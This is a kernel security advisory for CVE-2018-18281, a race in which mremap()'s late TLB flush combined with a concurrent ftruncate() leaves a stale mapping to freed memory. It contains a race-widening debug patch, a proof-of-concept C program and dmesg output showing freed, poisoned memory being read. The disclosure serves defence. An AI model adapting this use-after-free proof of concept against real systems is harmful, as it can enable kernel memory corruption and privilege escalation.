Linux: mremap() TLB flush too late with concurrent ftruncate() 

CVE-2018-18281


Tested on the master branch (4.19.0-rc7+).

sys_mremap() takes current->mm->mmap_sem for writing, then calls
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE
locks) in a loop, then performs a TLB flush with flush_tlb_range().
move_ptes() can also perform TLB flushes, but only when dirty PTEs are
encountered - non-dirty, accessed PTEs don't trigger such early flushes.
Between the move_ptes() loop and the TLB flush, the only lock being
held in move_page_tables() is current->mm->mmap_sem.

sys_ftruncate()->do_sys_ftruncate()->do_truncate()->notify_change()
->shmem_setattr()->unmap_mapping_range()->unmap_mapping_pages()
->unmap_mapping_range_tree()->unmap_mapping_range_vma()
->zap_page_range_single() can concurrently access the page tables of a
process that is in move_page_tables(), between the move_ptes() loop
and the TLB flush.

The following race can occur in a process with three threads A, B and C:

A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED
C: starts reading from address X in a busyloop
A: starts an mremap() call that remaps from X to Y; syscall progresses
   until directly before the flush_tlb_range() call in
   move_page_tables().
[at this point, the PTE for X is gone, but C still has a read-only TLB
entry for X; the PTE for Y has been created]
B: uses sys_ftruncate() to change the file size to zero. this removes
   the PTE for address Y, then sends a TLB flush IPI *for address Y*.
   TLB entries *for address X* stays alive.

The kernel now assumes that the page is not referenced by any
userspace task anymore, but actually, thread C can still use the stale
TLB entry at address X to read from it.

At this point, the page can be freed as soon as it disappears from the
LRU list (which I don't really understand); it looks like there are
various kernel interfaces that can be used to trigger
lru_add_drain_all(). For simplicitly, I am using root privileges to
write to /proc/sys/vm/compact_memory in order to trigger this.


To test this, I configured my kernel with PAGE_TABLE_ISOLATION=n,
CONFIG_PREEMPT=y, CONFIG_PAGE_POISONING=y, and used the kernel
commandline flag "page_poison=1". I patched the kernel as follows to
widen the race window (and make debugging easier). A copy of the patch
is attached.

===========
diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c
index e96b99eb800c..8156628a6204 100644
--- a/arch/x86/mm/tlb.c
+++ b/arch/x86/mm/tlb.c
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)
        if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))
                return;
 
+       if (strcmp(current->comm, "race2") == 0) {
+               pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",
+                       f->start, f->end);
+       }
+
        count_vm_tlb_event(NR_TLB_REMOTE_FLUSH_RECEIVED);
        flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);
 }
diff --git a/mm/compaction.c b/mm/compaction.c
index faca45ebe62d..27594b4868ec 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)
 {
        int nid;
 
+       pr_warn("compact_nodes entry\n");
+
        /* Flush pending updates to the LRU lists */
        lru_add_drain_all();
 
        for_each_online_node(nid)
                compact_node(nid);
+
+       pr_warn("compact_nodes exit\n");
 }
 
 /* The written value is actually unused, all memory is compacted */
diff --git a/mm/mremap.c b/mm/mremap.c
index 5c2e18505f75..be34e0a7258e 100644
--- a/mm/mremap.c
+++ b/mm/mremap.c
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,
                flush_tlb_range(vma, old_end - len, old_end);
        else
                *need_flush = true;
+
        pte_unmap_unlock(old_pte - 1, old_ptl);
        if (need_rmap_locks)
                drop_rmap_locks(vma);
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,
                move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,
                          new_pmd, new_addr, need_rmap_locks, &need_flush);
        }
-       if (need_flush)
+       if (need_flush) {
+               if (strcmp(current->comm, "race") == 0) {
+                       int i;
+                       pr_warn("spinning before flush\n");
+                       for (i=0; i<100000000; i++) barrier();
+                       pr_warn("spinning before flush done\n");
+               }
                flush_tlb_range(vma, old_end-len, old_addr);
+               if (strcmp(current->comm, "race") == 0) {
+                       pr_warn("flush done\n");
+               }
+       }
 
        mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);
 
diff --git a/mm/page_poison.c b/mm/page_poison.c
index aa2b3d34e8ea..5ffe8b998573 100644
--- a/mm/page_poison.c
+++ b/mm/page_poison.c
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)
 {
        void *addr = kmap_atomic(page);
 
+       if (*(unsigned long *)addr == 0x4141414141414141UL) {
+               WARN(1, "PAGE FREEING BACKTRACE");
+       }
+
        memset(addr, PAGE_POISON, PAGE_SIZE);
        kunmap_atomic(addr);
 }
diff --git a/mm/shmem.c b/mm/shmem.c
index 446942677cd4..838b5f77cc0e 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                }
                if (newsize <= oldsize) {
                        loff_t holebegin = round_up(newsize, PAGE_SIZE);
+
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr entry\n");
+                       }
+
                        if (oldsize > holebegin)
                                unmap_mapping_range(inode->i_mapping,
                                                        holebegin, 0, 1);
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                                unmap_mapping_range(inode->i_mapping,
                                                        holebegin, 0, 1);
 
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr exit\n");
+                       }
+
                        /*
                         * Part of the huge page can be beyond i_size: subject
                         * to shrink under memory pressure.
===========


Then, I ran the following testcase a few times (compile with
"gcc -O2 -o race race.c -pthread"; note that the filename matters for
the kernel patch):

===========
#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define ul unsigned long

static int alloc_fd = -1;
#define allocptr ((ul *)0x100000000000)
#define allocptr2 ((ul *)0x100000002000)

void *reader_fn(void *dummy) {
  prctl(PR_SET_NAME, "race2");
  while (1) {
    ul x = *(volatile ul *)allocptr;
    if (x != 0x4141414141414141UL) {
      printf("GOT 0x%016lx\n", x);
    }
  }
}

void *truncate_fn(void *dummy) {
  if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");
  int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);
  if (sysctl_fd == -1) err(1, "unable to open sysctl");
  write(sysctl_fd, "1", 1);
  sleep(1);
  return 0;
}

int main(void) {
  alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);
  if (alloc_fd == -1) err(1, "open");
  char buf[0x1000];
  memset(buf, 0x41, sizeof(buf));
  if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");
  if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");

  pthread_t reader;
  if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");
  sleep(1);

  pthread_t truncator;
  if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");

  if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");
  sleep(1);
  return 0;
}
===========

After a few attempts, I get the following output:

===========
user@debian:~/mremap_ftruncate_race$ sudo ./race
GOT 0xaaaaaaaaaaaaaaaa
Segmentation fault
user@debian:~/mremap_ftruncate_race$ 
===========

Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.

dmesg reports:
===========
shmem_setattr entry
shmem_setattr exit
spinning before flush
shmem_setattr entry
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000
shmem_setattr exit
compact_nodes entry
------------[ cut here ]------------
PAGE FREEING BACKTRACE
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180
Modules linked in: btrfs xor zstd_compress raid6_pq
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G        W         4.19.0-rc7+ #188
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Workqueue: mm_percpu_wq lru_add_drain_per_cpu
RIP: 0010:kernel_poison_pages+0x10a/0x180
[...]
Call Trace:
 free_pcp_prepare+0x45/0xb0
 free_unref_page_list+0x7c/0x1b0
 ? __mod_zone_page_state+0x66/0xa0
 release_pages+0x178/0x390
 ? pagevec_move_tail_fn+0x2b0/0x2b0
 pagevec_lru_move_fn+0xb1/0xd0
 lru_add_drain_cpu+0xe0/0xf0
 lru_add_drain+0x1b/0x40
 process_one_work+0x1eb/0x400
 worker_thread+0x2d/0x3d0
 ? process_one_work+0x400/0x400
 kthread+0x113/0x130
 ? kthread_create_worker_on_cpu+0x70/0x70
 ret_from_fork+0x35/0x40
---[ end trace aed8d7b167ea0097 ]---
compact_nodes exit
spinning before flush done
flush done
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]
[...]
===========


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh